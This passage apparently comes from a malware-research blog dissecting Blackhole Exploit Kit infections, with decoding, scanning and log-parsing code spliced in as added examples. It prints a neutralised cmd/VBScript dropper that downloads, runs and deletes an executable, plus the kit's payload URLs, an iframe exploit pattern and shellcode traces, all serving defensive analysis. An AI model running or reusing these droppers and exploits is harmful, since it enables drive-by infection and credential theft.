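    for name, value in parse_qsl(urlsplit(url).query):
        try:
            decoded[name] = decode_x(value)
        except ValueError:
            decoded[name] = None
    return decoded


def decode_keywords(keywords):
    """The XFA loop without the eval: parseInt(pair, 28) -> String.fromCharCode."""
    return "".join(chr(int(keywords[i:i + 2], 28))
                   for i in range(0, len(keywords), 2))


def encode_keywords(text):
    """Round-trip helper: two base-28 digits per character (codes below 784 only)."""
    return "".join(BASE28[ord(c) // 28] + BASE28[ord(c) % 28] for c in text)


def decode_creationdate(csv_hex):
    """Turn the comma-separated hex bytes of /CreationDate into raw shellcode bytes."""
    return bytes(int(tok, 16) for tok in csv_hex.split(",") if tok.strip())


# Values quoted in the post (Keywords and CreationDate only as far as shown).
SAMPLE_URL = ("http://x.x.x.x/links/anybody_miss-knowing.php"
              "?mkk=373402380a&jiypmeg=3f&eawqt=03370302073706343433"
              "&ytejxs=0b000300020002")
KEYWORDS_PREFIX = "3d40401i3d3o3h4244253h463h3q441i"
CREATIONDATE_TAIL = "70,3a,2f,2f,36,39,2e,31,39,34,2e,31,39"

if __name__ == "__main__":
    print(decode_query(SAMPLE_URL))          # the pdfver value comes out as 9.1.0.0
    print(decode_keywords(KEYWORDS_PREFIX))  # the start of the script eval'd by the PDF
    print(decode_creationdate(CREATIONDATE_TAIL))  # tail of the payload URL in the shellcode
```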
Note: I wrote in a previous post about the JavaScript used in PDFs like this one, but the logic of the PDF/JS used has changed. Please take note.. The last part of the shellcode was actually the URL leading to the payload to be dropped on the user, with the URI details below:
0x0184 /phttp://x.x.x.x/links/anybody_miss-knowing.php?cmpspxc=373402380a&jwk=03370302073706343433&ntzziqi=03&gbks=coi&swlmlswl=culvtnu
The collection of these evil junks we analyzed is below. PS: I made a mistake and lost the PE payload unsaved by a proxy operation; I couldn't get the payload in the attempt I made afterward, it was a one-time shot.. Sorry for not being able to analyze it..
List of VirusTotal results for each unique sample with initial AV detection ratio:
FILENAME                   MD5                                DETECT RATIO
------------------------------------------------------------------------
index.html                 9f7ea93cfc911305084c16fb3aeb6517   (18 / 42)
js.js                      8c53450b115b26d4144eac9d5f11852e   ( 0 / 43)
anybody_miss-knowing.php   02746b26613d881314d84f3b51d1ad97   ( 3 / 42)
acropdf.pdf                b72c668b370cc7271094836ad6180d5e   ( 8 / 43)
acropdf2.pdf               f78b18ac786199548e647d94da0555ad   ( 8 / 43)
↑Conclusion:

New modifications/changes in the landing page's obfuscated code and some recoding in the PluginDetect of BHEK2 are starting to be seen; the detection ratio of the landing page is currently low for this reported case, so I guess they got what they wanted, at this moment.

Not new stuff, but I add it anyway: the landing page is covered well by several forwarding steps and is not linked directly from the global link like spam; they currently use a simple redirector for it, which passes the correct parameters to the landing page, and only those redirector URLs can be found in spam mails.

And, as announced everywhere, the payload download links generated from the BHEK2 landing page are indeed getting longer, but as written on (@kafeine)'s site, these findings contain more (3 or 4) parameters per request, not one or two long strings as first mentioned elsewhere. See the snips below (real case samples):

blah.php?mkk=373402380a&jiypmeg=3f&eawqt=03370302073706343433&ytejxs=0b000300020002
blah.php?teredt=373402380a&teysll=4740&limflyi=cpsn&ixvr=joucpxn
blah.php?sby=373402380a&ozitwo=03370302073706343433&udyuxlri=04&gvfvizk=azme&gre=prxm
Moreover about those links: if you have a lead, be careful with it, since you may only get one chance to grab it. In dealing with BHEK2, it is better to research those infectors as a group rather than alone. I lost my payload for this reason..

Reference: (The order is unsorted.. No reason..)

1. Contagio: CVE-2012-4681 samples Original (APT) and Blackhole 2.0 (crime)
2. Malware don't need Coffee: Fast look at an infection by a Blackhole Exploit Kit 2.0
3. Trustwave SpiderLabs: Blackhole Exploit Kit v2
4. Malware don't need Coffee: Behind the Captcha or Inside Blackhole Exploit Kit 2.0 - Exploit Kit Administration Panel
5. XyliBox : Blackhole 2.0

Blackhole Previous Versions:

via Xylibox: v1.20, v1.21, v1.23 & Malware don't need Coffee: v1.25

#MalwareMustDie!

Thursday, September 20, 2012

"Geek" Way in Reversing #CVE-2010-1885 Infection via PluginDetect Script/Blackhole EK (85.17.165.22)

Just finished handling a local infection case today; behind this case is the beloved Blackhole exploit kit. Some WinXP machines, because of third-party software compatibility trouble, can't install Microsoft's critical patch (MS10-042) properly; this patch is for the infamous CVE-2010-1885, a critical vulnerability in the MPC::HexToNum function of helpctr.exe (a.k.a. the hcp:// URL flaw). These clients accidentally opened a spam mail containing the BHEK infected URL (some of you like to call it the "BHEK landing page"), downloading a payload which the installed antivirus software cannot even detect yet.

That just happened today and really made my day. Since the flaw was fixed by Microsoft about 2 years ago, I never expected to see unpatched systems still having this flaw, yet they do exist, a bunch of them. Since other XP users possibly have a similar risk, I dare myself to write up the reversing of this infection for your information on handling similar cases.

The infector was BHEK in 85.17.165.22, which looks to have been up less than 24h,
with reports here--->>[URL-QUERY-LINK]
The landing page is:  h00p://85.17.165.22/main.php?page=9adab93ef87c3421

And it has the infection components below:
/Gam.jar           EXPL: Java/2012-1723 (go to below explanation)
/data/field.swf    EXPL: SWF/Cve-2011-0611 ---> shellcode --> same payload
/data/ap1.php      EXPL: JS/PDF.PdfCtrl old ver. SAV: AcroPDF.PDF --> shellcode --> same payload
/data/ap2.php      EXPL: JS/PDF.PdfCtrl new ver. SAV: AcroPDF.PDF --> shellcode --> same payload
/w.php?f=f4dfb&e=1 EXPL: Java/2012-1723 SAV: Gam.Jar --> Shellcode --> SAV: same payload
/w.php?f=f4dfb&e=2 EXPL: CVE-2010-2561/msxml2.XMLHTTP SAV: .//..//6f9d07d.exe --> same payload
/w.php?f=f4dfb&e=5 EXPL: CVE-2010-1885/HRC vulns SAV: %TEMP%\file.exe
↑See the last line closely; this is the case I will describe here. If you deobfuscate the landing page well, you'll see the BHEK plugin detect code; just in case, you can see my neutralized deobfuscated code here: --->>[PASTEBIN]. At line 1790 you will see code like this:
Function spl4(){
  try {
    For (var i = O, m; i < navigator・plugins・length; i ++ ){
      var name = navigator・plugins「i」.name;
      iF (name.indexOF('Media Player') !=- 1){
        m = document・createElement('IFRAM3');
        m.setAttribute('src', './data/hhcp.php?c=F4dFb');
        m.setAttribute('width', O);
        m.setAttribute('height', O);
        document・body「'appendChild'」(m)
      }
Which will lead you to the downloaded HTML file at:
h00p://85.17.165.22/data/hhcp.php?c=F4dFb
And this file contains other obfuscated code like this: the eval can be decoded as per the pic below, an iframe containing the exploit and also an arbitrary command execution. The format of the malicious iframe is as below:
<iframe src="xxxxx=<script defer>Run(yyyyy);</script>">
//legend:
xxxxx = CVE-2010-1885 PoC strings
yyyyy = arbitrary executable command
If you compare "xxxxx" with the PoC of CVE-2010-1885 you'll see the similarity: ↑here's the PoC link-->http://seclists.org/fulldisclosure/2010/Jun/205. Following, the "yyyyy" is a combination of cmd and Windows (Visual Basic) Script commands:
cmd /c echo FileName = "%TEMP%\file・exe">>%TEMP%\
 go・vbs&&echo url="http://x・x・x・x/w・php?f=f4dfb&e=5" >>%TEMP%\
 go・vbs&&echo Set objHTTP = CreateObject("MSXML2・XMLHTTP")>>%TEMP%\
 go・vbs&&echo Call objHTTP・Open("GET", url, False)>>%TEMP%\
 go・vbs&&echo objHTTP・Send>>%TEMP%\
 go・vbs&&echo set oStream = createobject("Adodb・Stream")>>%TEMP%\
 go・vbs&&echo Const adTypeBinary = 1 >>%TEMP%\
 go・vbs&&echo Const adSaveCreateOverWrite = 2 >>%TEMP%\
 go・vbs&&echo Const adSaveCreateNotExist = 1 >>%TEMP%\
 go・vbs&&echo oStream・type = adTypeBinary >>%TEMP%\
 go・vbs&&echo oStream・open >>%TEMP%\
 go・vbs&&echo oStream・write objHTTP・responseBody>>%TEMP%\
 go・vbs&&echo oStream・savetofile FileName, adSaveCreateNotExist >>%TEMP%\
 go・vbs&&echo oStream・close>>%TEMP%\
 go・vbs&&echo set oStream = nothing >>%TEMP%\
 go・vbs&&echo Set xml = Nothing >>%TEMP%\
 go・vbs&&echo Set WshShell = CreateObject("WScript・Shell") >>%TEMP%\
 go・vbs&&echo WshShell・Run FileName, 0, True >>%TEMP%\
 go・vbs&&echo Set FSO = CreateObject("Scripting・FileSystemObject") >>%TEMP%\
 go・vbs&&echo FSO・DeleteFile "%TEMP%\go・vbs" >>%TEMP%\
 go・vbs|cscript %TEMP%\
 go・vbs>nul
(PS: the above code was neutralized and NOT malicious!)
↑Which means:
Download the file from 85.17.165.22/w・php?f=f4dfb&e=5 and save it as %TEMP%\file.exe via an MSXML2・XMLHTTP stream, then run it via WshShell.Run and DELETE the saved file afterwards. (This was the reason I couldn't get the sample file from the infected PC and had to extract it out of memory manually.)
The worse part is that almost everyone misses this tiny obfuscated file; even in VirusTotal ONLY 3 (three) products detect it:
MD5: 5629b24e0faae7b42127df9f592fed48
File size: 5.2 KB ( 5326 bytes )
File name: hhcp.php@c=f4dfb
File type: HTML
Tags: html cve-2010-1885 exploit
Detection: 3 / 43
Analysis date: 2012-09-19 19:36:44 UTC ( 1 時間, 7 分 ago )
URL: ------>>[VIRUS-TOTAL]
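Since this tiny page slips past nearly every scanner, here is an added example (my code, not the post's own) of a scanner for the two things that identify it: an iframe whose src smuggles a `<script>` (or points at the hcp:// handler) and the echo-to-%TEMP%\go.vbs dropper markers quoted above. The sample HTML is constructed with a placeholder in place of the exploit string, and the indicator names and verdict rule are my own.

```python
"""Scanner for hhcp.php-style pages: iframe-smuggled <script> plus the
echo-to-go.vbs dropper markers from the post. Added example, not the post's code."""
import html
import re

# Tag-level indicator: an <iframe ...> whose src attribute runs into a <script> tag.
IFRAME_SMUGGLED_SCRIPT = re.compile(r"<iframe\b[^>]*?src\s*=\s*['\"]?[^>]*?<script", re.I | re.S)
# An iframe pointing at the hcp:// handler (the CVE-2010-1885 vector).
IFRAME_HCP = re.compile(r"<iframe\b[^>]*?src\s*=\s*['\"]?\s*hcp://", re.I | re.S)

# Dropper markers taken from the neutralized command chain quoted in the post.
DROPPER_MARKERS = {
    "cmd_echo_chain": re.compile(r"cmd\s*/c\s*echo\b", re.I),
    "msxml_http":     re.compile(r"MSXML2\.XMLHTTP", re.I),
    "adodb_stream":   re.compile(r"Adodb\.Stream", re.I),
    "savetofile":     re.compile(r"\bsavetofile\b", re.I),
    "wsh_run":        re.compile(r"WScript\.Shell|WshShell\.Run", re.I),
    "cscript_temp":   re.compile(r"cscript\s+%TEMP%\\", re.I),
    "self_delete":    re.compile(r"\bDeleteFile\b", re.I),
}

# Constructed sample: the iframe shape from the post, exploit string replaced
# by a placeholder and the command chain cut down to a fragment.
SAMPLE_HTML = (
    '<html><body><iframe src="hcp://[EXPLOIT-STRING-PLACEHOLDER]=<script defer>'
    "Run('cmd /c echo Set objHTTP = CreateObject(&quot;MSXML2.XMLHTTP&quot;)"
    ">>%TEMP%\\go.vbs&&cscript %TEMP%\\go.vbs');</script>\"></iframe></body></html>"
)
# Constructed benign control: a normal zero-size iframe plus an inline script.
BENIGN_HTML = '<iframe src="https://example.org/w" width="0"></iframe><script>var a=1;</script>'


def scan_html(text):
    """Return matched indicator names and a verdict for one HTML document."""
    text = html.unescape(text)  # &quot; etc. are a cheap way to hide the markers
    hits = []
    if IFRAME_SMUGGLED_SCRIPT.search(text):
        hits.append("iframe_embeds_script")
    if IFRAME_HCP.search(text):
        hits.append("iframe_hcp_scheme")
    dropper_hits = [name for name, rx in DROPPER_MARKERS.items() if rx.search(text)]
    hits.extend(dropper_hits)
    # Either structural sign alone is enough; otherwise need several dropper markers.
    structural = "iframe_embeds_script" in hits or "iframe_hcp_scheme" in hits
    verdict = "suspicious" if structural or len(dropper_hits) >= 3 else "clean"
    return {"verdict": verdict, "indicators": hits}
```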
Furthermore, the payload carries this "fake" Intel logo (see pic), and runs both of these processes:
PID MEM        PATH                Event    
216 2007536674 %path%unknown.exe   Global\crypt32LogoffEvent //Stays as process
840 2088831062 %System%svchost.exe //Kicking off svchost
I don't have enough time to do a deep analysis of this binary, so a quickie then.. Binary snapshot:
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 C8 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   A9 0B B2 8A ED 6A DC D9 ED 6A DC D9 ED 6A DC D9    .....j...j...j..
0090   EB 49 D6 D9 E6 6A DC D9 ED 6A DD D9 F3 6A DC D9    .I...j...j...j..
00A0   73 4A FF D9 EC 6A DC D9 B4 49 CF D9 EC 6A DC D9    sJ...j...I...j..
00B0   82 75 D8 D9 EC 6A DC D9 52 69 63 68 ED 6A DC D9    .u...j..Rich.j..
00C0   00 00 00 00 00 00 00 00 50 45 00 00 4C 01 07 00    ........PE..L...
00D0   A8 78 57 50 00 00 00 00 00 00 00 00 E0 00 03 01    .xWP............
Section:
   .text  0x44000(snipped)
   .rdata 0x45000 0x2d84 11776
   .data  0x48000 0xd38 3584
   .adata 0x49000 0x10 512
   .CRT   0x4b000 0x10 512 <--- cryptor pack
   .rsrc  0x4c000 0x1a18 7168 
Entry Point: 0x1e490
Compile Time: 0x505778A8 [Mon Sep 17 19:23:20 2012 UTC]
Packer: unknown
Shortly, some suspicious calls were detected while it stays in process.. Below is my adventure in the reversing graph, the way it steals so much info; I guess it is a variant of the ZeuS Trojan or ZeuS/Zbot↓ In the meantime VirusTotal detects it as below:
MD5: c559573fc5ab9862607e4fa4b2edfc04
File size: 294.0 KB ( 301056 bytes )
File name: unknown.exe
File type: Win32 EXE
Detection: 19 / 43
Analysis date: 2012-09-19 17:58:31 UTC ( 1 分 ago )
URL:---->>[VIRUS-TOTAL]
The current malware names are:
F-Secure                 : Trojan.Generic.KD.731435
Microsoft                : PWS:Win32/Zbot
VIPRE                    : Trojan.Win32.Generic!BT
Symantec                 : Trojan.Gen
TrendMicro               : TROJ_GEN.R42CDII
McAfee-GW-Edition        : PWS-Zbot.vo!a
Fortinet                 : W32/Androm.DW!tr
TrendMicro-HouseCall     : TROJ_GEN.R42CDII
Avast                    : Win32:Trojan-gen
Ikarus                   : Trojan-Spy.Win32.Zbot
GData                    : Trojan.Generic.KD.731435
Kaspersky                : HEUR:Trojan.Win32.Generic
BitDefender              : Trojan.Generic.KD.731435
McAfee                   : PWS-Zbot.gen.ana
Panda                    : Trj/Genetic.gen
AhnLab-V3                : Spyware/Win32.Zbot
AntiVir                  : TR/Injector.air.1
Sophos                   : Mal/EncPk-AGK
Comodo                   : UnclassifiedMalware
The moral of the story is: do not underestimate "every" exploit implemented in the exploit kit. Those exploits are picked well and are meant for a well-planned infection purpose, even the one you think has the smaller chance to infect. When it hits, you may get yourself an epidemic.

And, to malware analysts/researchers (etc.), understanding how an infection works by reversing the malicious+exploit code yourself will change the way you think about handling malware in the future, trust me. You may continue with whatever automation system/tool you use, but at least, for one time, try to figure it out by yourself! I won't sell you no crap.

#MalwareMustDie!

Tuesday, September 18, 2012

Monitoring a BlackHole Exploit Kit Services & Infectors (Target: 203.91.113.6)

Monitoring the activity of one Blackhole (in short: BHEK) host means spending time on it for days. I picked one positive BHEK host at 203.91.113.6 and stuck to it for about a week; this host is quite active as a malware infector, which is one of the reasons I picked it.
I think I was careful enough in monitoring it, so I don't think they even sensed being monitored, which gave me much time to analyze it. Here's what I found...
  
Background

The spam email containing a malicious link to this host on Sept 5th was
what made me start to monitor this host. Maybe some of you still remember
this spam:
From: HM Revenue & Customs [mailto:refund.request@hmrc.gov.uk]
To: xxxx
Sent: 05 September 2012 xx:xx (time was varied)
Subject: Tax Refund Alert - Action Required
How to complain, ask for a review or make an appeal
Review process update
Review process - the first 12 months. Find out more
Claim Your Tax Refund Online
We identified an error in the [link]
↑This spam actually infected users w/ Cridex. At that time the domains used were gdeounitrg.com and gsigallery.net. URLQuery data also shows a long list of reported malware infectors coming from this host, which you can access here--->>[CLICK]. From that list we can see the recent infector domains used by this host.
If you look at each report listed in↑URLQuery by date, you will see this host never uses the same domain for more than 2 days (MAX). Since the URLs listed are landing pages, I can assume an email malvertising scheme.
Services used: During the initial monitoring period I detected the services below:
21/tcp   open     ftp
22/tcp   open     ssh
23/tcp   open     telnet
80/tcp   open     http
111/tcp  open     rpcbind
135/tcp  open     msrpc
136/tcp  open     profile
137/tcp  open     netbios-ns
138/tcp  open     netbios-dgm
139/tcp  open     netbios-ssn
389/tcp  open     ldap
636/tcp  open     ldapssl
1025/tcp open     NFS-or-IIS
5000/tcp open     UPnP
5050/tcp open     mmcc
8009/tcp open     ajp13
8080/tcp open     http-proxy
A couple of days ago I realized it had filtered its previously open ports/services, and added some more too, which looks like this now:
21/tcp   open     ftp
22/tcp   open     ssh
23/tcp   open     telnet
80/tcp   open     http
111/tcp  open     rpcbind
135/tcp  filtered msrpc <-----1
136/tcp  filtered profile <-----1
137/tcp  filtered netbios-ns <-----1
138/tcp  filtered netbios-dgm <----1
139/tcp  filtered netbios-ssn <-----1
389/tcp  open     ldap
445/tcp  filtered microsoft-ds <-----1
636/tcp  open     ldapssl
1025/tcp filtered NFS-or-IIS <-------1
1337/tcp filtered waste
3001/tcp filtered nessusd  <-----2
3128/tcp filtered squid-http <-----3
5000/tcp filtered UPnP
5050/tcp open     mmcc
8009/tcp open     ajp13
8080/tcp open     http-proxy <---4
Legend:
1 = Windows services, never filtered previously
2 = nessus scanner daemon service
3 = squid proxy is running
4 = http web server
↑It filtered some TCP ports related to the Windows services. To make sure this is still the same Windows server as before, I re-checked its OS fingerprint every day:
Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW
What about the web services used (ports 80 and 8080)? Let's see what happens on port 8080:
GET / HTTP/1.1
User-Agent: blah
Host: virtual-geocaching.net:8080
Accept: */*

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1 <---- here
Accept-Ranges: bytes
ETag: W/"7777-1279522786000"
Last-Modified: Mon, 19 Jul 2010 06:59:46 GMT
Content-Type: text/html
Content-Length: 7777
Date: Tue, 18 Sep 2012 08:48:01 GMT
While this is what happens on port 80:
GET / HTTP/1.1
User-Agent: blah
Host: virtual-geocaching.net
Accept: */*

HTTP/1.1 403 Forbidden
Server: nginx/1.3.3 <--- here
Date: Tue, 18 Sep 2012 08:51:49 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 202
Connection: close
↑So on TCP/8080 we see a Tomcat and on TCP/80 an nginx. Now we see nginx, Apache, file sharing, telnet, ssh and an ftp server. The filtered ports are: nessus for port scanning, and a squid proxy which I probed to be set outbound. I have seen some Blackhole hosts, but never a guarded one with heavy services running like this; moreover NFS & LDAP services are also running, which suggests a possibility of records or maybe C&C activity on it. OK, let's continue with what this BHEK actually does now..
Infector scheme and malwares
Consulting my EK mentor @kafeine, who kindly guides me in EK infection cases: what looked like an old version of BHEK (1.2.5) possibly got upgraded to the latest BHEK v2, since there were some changes, so I used a tool on a FreeBSD box to check the infector scheme. We picked the latest infector structure from urlQuery:
virtual-geocaching.net/main.php?page=7de3f5c4200c896e
..And this is what I fetched as samples: ↑all of this evil mess is what a user will get by clicking one infector URL above. File details are as follows:
AcroPDF.PDF                    50583375d345fb7a294e26094601699a   18406
field.swf                      d41d8cd98f00b204e9800998ecf8427e       0
Gam.jar                        ab4af9072132f170024a9072e0288459   32171
main.php@page=7de3f5c4200c896e de277f4802b1b59bb2d0f2cafb3137a3   69023
shellcode.sc                   ac157a90724aec74a1de6e0a20d4db0d     466
wpbt0.dll/e88d779.exe          3158bc97bf424fcd905caa22b29767b9  119143
While these come through the redirected URLs of the infector below:
/main.php?page=7de3f5c4200c896e <--JS/Obfs Infector
/Gam.jar   <----- exploit java CVE-2012-1723/CVE-2012-4681 w/ shellcode
/data/ap2.php  <----PDF Malware Pdfka/EXP with shellcode
/w.php?f=80f39&e=1 <---- payload EXE (Troj/CRIDEX dropped by JS/HTML shellcode)
/w.php?f=80f39&e=2 <-----payload EXE (troj/CRIDEX dropped by PDF)
/data/hhcp.php?c=80f39  <----0 byte (link for SWF)
/data/field.swf <-- 0 byte supposed to be flash/shockwave
/w.php?f=80f39&e=4 <--- url dropped to PDF shellcode
↑The point of this scheme is to infect the user with Trojan/Cridex. The infector scheme is as follows: the landing page is HTML containing obfuscated JS code; a neutralized sample is here---->>[PASTEBIN], and this code deobfuscated is here---->>[PASTEBIN]. There you can see the BHEK plugin detection code that exploits your browser via the vulnerable sector, along the routes below:
Java Object (Gam.jar) --> shellcode1 --> Troj/Cridex(PE)
PDF File (AcroPDF.PDF)--> shellcode2 --> Troj/Cridex(PE)
DOMDocs Msxml2.XMLHTTP --------> Troj/Cridex(PE)
Java Exploit javaplugin.191_40 --> shellcode1 --> Troj/Cridex(PE)
JavaWebStart.isInstalled -->shellcode1 --> Troj/Cridex(PE)
SWF Exploit (field.swf) --> null (at least at this moment..)
Landing page itself/HTML --> shellcode1 --> Troj/Cridex(PE)
The above scheme was recorded in the log of my FreeBSD box below:
[h00p] URL: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e (Status: 200, Referrer: None)
[Navigator URL Translation] Gam.jar -->  h00p://virtual-geocaching.net/Gam.jar
[h00p] URL: h00p://virtual-geocaching.net/Gam.jar (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving applet Gam.jar

[Window] Eval argument length > 64 (33842)
ActiveXObject: msxml2.xmlh00p
ActiveXObject: acropdf.pdf
Unknown ActiveX Object: shockwaveflash.shockwaveflash.15
Unknown ActiveX Object: shockwaveflash.shockwaveflash.14
Unknown ActiveX Object: shockwaveflash.shockwaveflash.13
Unknown ActiveX Object: shockwaveflash.shockwaveflash.12
Unknown ActiveX Object: shockwaveflash.shockwaveflash.11
ActiveXObject: shockwaveflash.shockwaveflash.10


Unknown ActiveX Object: javawebstart.isinstalled.1.9.1.0
Unknown ActiveX Object: javawebstart.isinstalled.1.9.0.0
Unknown ActiveX Object: javawebstart.isinstalled.1.8.1.0
Unknown ActiveX Object: javawebstart.isinstalled.1.8.0.0
ActiveXObject: javawebstart.isinstalled.1.7.1.0
Unknown ActiveX Object: javaplugin.171_40
Unknown ActiveX Object: javaplugin.171_39
Unknown ActiveX Object: javaplugin.171_38
Unknown ActiveX Object: javaplugin.171_37
Unknown ActiveX Object: javaplugin.171_36
Unknown ActiveX Object: javaplugin.171_35
Unknown ActiveX Object: javaplugin.171_34
Unknown ActiveX Object: javaplugin.171_33
Unknown ActiveX Object: javaplugin.171_32
Unknown ActiveX Object: javaplugin.171_31
ActiveXObject: javaplugin.171_30
ActiveXObject: javawebstart.isinstalled.1.7.1.0
[Navigator URL Translation] ./data/ap2.php -->  h00p://virtual-geocaching.net/data/ap2.php
[h00p] URL: h00p://virtual-geocaching.net/data/ap2.php (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
[Navigator URL Translation] ./data/hhcp.php?c=80f39 -->  h00p://virtual-geocaching.net/data/hhcp.php?c=80f39
[h00p] URL: h00p://virtual-geocaching.net/data/hhcp.php?c=80f39 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
ActiveXObject: D27CDB6E-AE6D-11CF-96B8-444553540000
[h00p] URL: h00p://virtual-geocaching.net/w.php?f=80f39&e=1 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving remote content at h00p://virtual-geocaching.net/w.php?f=80f39&e=1 (MD5: 3158bc97bf424fcd905caa22b29767b9)

[Navigator URL Translation] ./data/ap2.php -->  h00p://virtual-geocaching.net/data/ap2.php
[iframe redirection] h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e -> h00p://virtual-geocaching.net/data/ap2.php
[h00p] URL: h00p://virtual-geocaching.net/data/ap2.php (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)

[Navigator URL Translation] ./data/hhcp.php?c=80f39 -->  h00p://virtual-geocaching.net/data/hhcp.php?c=80f39
[iframe redirection] h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e -> h00p://virtual-geocaching.net/data/hhcp.php?c=80f39
[h00p] URL: h00p://virtual-geocaching.net/data/hhcp.php?c=80f39 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)

[Navigator URL Translation] data/field.swf -->  h00p://virtual-geocaching.net/data/field.swf
[h00p] URL: h00p://virtual-geocaching.net/data/field.swf (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving remote content at data/field.swf (MD5: d41d8cd98f00b204e9800998ecf8427e)
[Navigator URL Translation] data/field.swf -->  h00p://virtual-geocaching.net/data/field.swf
[h00p] URL: h00p://virtual-geocaching.net/data/field.swf (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
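To turn a log like the one above into the route table the post draws by hand, here is an added example (my code, not the post's or the honeyclient's own): a parser for the fetch, iframe-redirection, ActiveX-probe and saved-content lines, with the landing page's children and the probed plug-in versions pulled out. The sample log is a constructed subset of the lines quoted above, kept defanged (h00p) as in the post; the report layout and function names are mine.

```python
"""Parse the honeyclient log format quoted in the post into an infection graph.
Added example, not the post's own code; SAMPLE_LOG is a constructed subset of
the quoted log lines."""
import hashlib
import re

SAMPLE_LOG = """\
[h00p] URL: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e (Status: 200, Referrer: None)
[Navigator URL Translation] Gam.jar -->  h00p://virtual-geocaching.net/Gam.jar
[h00p] URL: h00p://virtual-geocaching.net/Gam.jar (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving applet Gam.jar
[Window] Eval argument length > 64 (33842)
ActiveXObject: acropdf.pdf
Unknown ActiveX Object: shockwaveflash.shockwaveflash.15
ActiveXObject: shockwaveflash.shockwaveflash.10
Unknown ActiveX Object: javaplugin.171_31
ActiveXObject: javaplugin.171_30
[iframe redirection] h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e -> h00p://virtual-geocaching.net/data/ap2.php
[h00p] URL: h00p://virtual-geocaching.net/data/ap2.php (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
[h00p] URL: h00p://virtual-geocaching.net/w.php?f=80f39&e=1 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving remote content at h00p://virtual-geocaching.net/w.php?f=80f39&e=1 (MD5: 3158bc97bf424fcd905caa22b29767b9)
[h00p] URL: h00p://virtual-geocaching.net/data/field.swf (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving remote content at data/field.swf (MD5: d41d8cd98f00b204e9800998ecf8427e)
"""

LANDING = "h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e"

RE_FETCH = re.compile(r"^\[h00p\] URL: (\S+) \(Status: (\d+), Referrer: (\S+)\)$")
RE_IFRAME = re.compile(r"^\[iframe redirection\] (\S+) -> (\S+)$")
RE_ACTIVEX = re.compile(r"^(Unknown ActiveX Object|ActiveXObject): (\S+)$")
RE_SAVED = re.compile(r"^Saving remote content at (\S+) \(MD5: ([0-9a-f]{32})\)$")
RE_EVAL = re.compile(r"^\[Window\] Eval argument length > 64 \((\d+)\)$")

EMPTY_MD5 = hashlib.md5(b"").hexdigest()  # MD5 of zero bytes: a 0-byte download


def parse_honeyclient_log(text):
    """One pass over the log; unknown line types are ignored."""
    report = {"fetches": [], "iframes": [], "activex_present": [],
              "activex_missing": [], "saved": {}, "empty_artifacts": [], "large_evals": []}
    for line in text.splitlines():
        line = line.strip()
        if (m := RE_FETCH.match(line)):
            url, status, ref = m.groups()
            report["fetches"].append({"url": url, "status": int(status),
                                      "referrer": None if ref == "None" else ref})
        elif (m := RE_IFRAME.match(line)):
            report["iframes"].append(m.groups())
        elif (m := RE_ACTIVEX.match(line)):
            kind, progid = m.groups()
            key = "activex_present" if kind == "ActiveXObject" else "activex_missing"
            report[key].append(progid)
        elif (m := RE_SAVED.match(line)):
            path, md5 = m.groups()
            report["saved"][path] = md5
            if md5 == EMPTY_MD5:  # the 0-byte field.swf case from the post
                report["empty_artifacts"].append(path)
        elif (m := RE_EVAL.match(line)):
            report["large_evals"].append(int(m.group(1)))
    return report


def children_of(report, url):
    """Every URL fetched with `url` as referrer: the components one landing page pulls in."""
    return [f["url"] for f in report["fetches"] if f["referrer"] == url]


def probed_versions(report, prefix):
    """Versions of one plug-in the landing page probed for, split into present
    and missing, e.g. prefix='javaplugin.' for the targeted Java builds."""
    present = [p[len(prefix):] for p in report["activex_present"] if p.startswith(prefix)]
    missing = [p[len(prefix):] for p in report["activex_missing"] if p.startswith(prefix)]
    return {"present": present, "missing": missing}
```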
About the #shellcode: we found 2 shellcodes, one coded in the landing page and the other coded in the PDF file, say shellcode 1 & 2. Shellcode 1 decoded:
BOOL VirtualProtectEx (
     HANDLE = 0x298dda60 => none;
     LPCVOID = 0x298dda70 => none;
     DWORD dwSize = 255;
     DWORD flNewProtect = 64;
     PDWORD lpflOldProtect = 64;
) =  0x1;
HMODULE LoadLibraryA (
     LPCTSTR = 0x298ddad0 => = "urlmon"; //urlmon.dll used
) =  0x7df20000;
DWORD GetTempPathA (
     DWORD nBufferLength = 248;
     LPTSTR = 0x298ddb00 => 
           = "c:\tmp\";
) =  0x7;
HRESULT URLDownloadToFile ( //downloads...
